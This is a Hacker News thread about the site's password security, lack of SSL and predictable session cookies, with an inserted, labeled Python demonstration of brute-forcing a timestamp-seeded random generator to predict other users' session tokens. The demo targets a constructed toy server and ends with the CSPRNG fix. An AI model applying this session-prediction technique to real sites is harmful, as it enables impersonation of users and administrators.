Hacker News

Seriously, enough with these threads already. The passwords aren't encrypted, he cries about it, they are encrypted, he cries about it. It's a news site, we're not controlling access to nuclear weapons here.


I think the main concern is not that someone can use your account here at HN but the fact that they can get the password file and use your password to access your personal emails and whatever else (assuming that you're using the same password, which some people do).


"assuming that you're using the same password, which some people do"

This is the key. You're an idiot if your Hacker News password is the same as that of your email.


Agreed, that's why mine's different :)


"The passwords aren't encrypted, he cries about it, they are encrypted, he cries about it."

Hmm. No, I don't. I only 'cry about it' (in your words) if the passwords are not adequately secured.


And the fact that there is no SSL? (Anyone can snoop your HN password in transit anyway.)


I guess you've found the next installment of the series.


No, I already mentioned that some place else. If you want to get interesting take a look at how unique IDs are generated.

They rely on the Scheme random number generator, which is seeded using the milliseconds of the Unix epoch. Since PG regularly restarts the server, it should be possible to get a window of time in which to test a succession of random number seeds. If you could hang around until the server was dead (say, test every few seconds), then log in and obtain a cookie, you'd have enough to do a prediction of the server seed. You could then run the random number generator forward, predicting cookie values, and then run them by the server to see which ones are valid.

As people log in you'd be able to impersonate them. Assuming that an admin logged in while you were testing you'd be able to impersonate an administrator and have some fun on the site.
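
The seed-recovery attack sketched in the comment above, as an added example that is not part of the thread and not HN's actual Arc/Scheme code. The PRNG here is a 32-bit LCG used as a stand-in (the real Scheme generator's internals are not modelled), the token format and timestamps are constructed, and the restart window is assumed known to within a few seconds. The point it shows is the general one: a timestamp seed with millisecond granularity is only a few thousand candidates per second of uncertainty, and one observed token is enough to pick the right one and replay the generator both forward and backward.

```python
import string

# Toy model of the attack described in the comment: a server whose session
# tokens come from a deterministic PRNG seeded with its start time in
# milliseconds. The PRNG here is a 32-bit LCG chosen for illustration; it is
# NOT the Scheme/Arc generator and the token format is invented.

ALPHABET = string.ascii_letters + string.digits
TOKEN_LEN = 10
MASK32 = 0xFFFFFFFF


class Lcg:
    """Stand-in PRNG: full-period 32-bit LCG (glibc-style constants)."""

    def __init__(self, seed):
        self.state = seed & MASK32

    def next_int(self):
        self.state = (1103515245 * self.state + 12345) & MASK32
        return self.state >> 16  # drop the weak low bits


def make_token(rng, n=TOKEN_LEN):
    """Draw n characters from the generator, one per output."""
    return "".join(ALPHABET[rng.next_int() % len(ALPHABET)] for _ in range(n))


class TokenServer:
    """Seeds its generator from the (hypothetical) restart time; one token per login."""

    def __init__(self, start_ms):
        self.rng = Lcg(start_ms)

    def login(self):
        return make_token(self.rng)


def recover_seed(observed, window_start_ms, window_end_ms, max_tokens=20):
    """Brute-force every millisecond seed in the restart window and replay the
    generator up to max_tokens logins deep, looking for the token we were
    issued. Returns (seed, index_of_our_token) or None if nothing matches."""
    for seed in range(window_start_ms, window_end_ms + 1):
        rng = Lcg(seed)
        for idx in range(max_tokens):
            if make_token(rng) == observed:
                return seed, idx
    return None


def predict_tokens(seed, already_issued, count):
    """Replay the generator past the tokens already handed out, then emit the
    next `count` tokens: these are the cookies the next logins will receive."""
    rng = Lcg(seed)
    for _ in range(already_issued):
        make_token(rng)
    return [make_token(rng) for _ in range(count)]


def demo():
    """Constructed scenario: server restarted at start_ms; an admin logs in,
    then the attacker; the attacker knows only a 3-second restart window."""
    start_ms = 1_234_567_890_123  # constructed restart timestamp
    server = TokenServer(start_ms)
    admin_token = server.login()  # issued before the attacker arrived
    my_token = server.login()     # the one token the attacker can see

    found = recover_seed(my_token, start_ms - 2000, start_ms + 1000)
    if found is None:
        return None
    seed, idx = found
    # Our token was the idx-th (0-based), so idx + 1 tokens are out so far.
    predicted = predict_tokens(seed, idx + 1, 3)
    actual = [server.login() for _ in range(3)]  # the next three real logins
    # With the seed known, earlier tokens (the admin's) are recoverable too.
    replayed_admin = predict_tokens(seed, 0, 1)[0]
    return {
        "seed_recovered": seed == start_ms,
        "our_index": idx,
        "future_predicted": predicted == actual,
        "admin_recovered": replayed_admin == admin_token,
    }


if __name__ == "__main__":
    print(demo())
```

Against a real target the attacker would not know how many logins preceded theirs, which is why `recover_seed` searches a depth of tokens per seed rather than assuming the first one, and would confirm candidate cookies against the server as the comment describes. The fix is the usual one: seed from an OS CSPRNG (or draw tokens from it directly) so the seed space is not a few thousand timestamps.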


Well, I'm sure you could find a gazillion race conditions. And you know what? Most of the time it doesn't matter.


I'd contribute $5 or $10 a year towards SSL via PayPal. Does anyone else care enough about password hijacking to pay a little? Though that might require a hardware upgrade, as well (if the scope extends beyond login to site browsing).



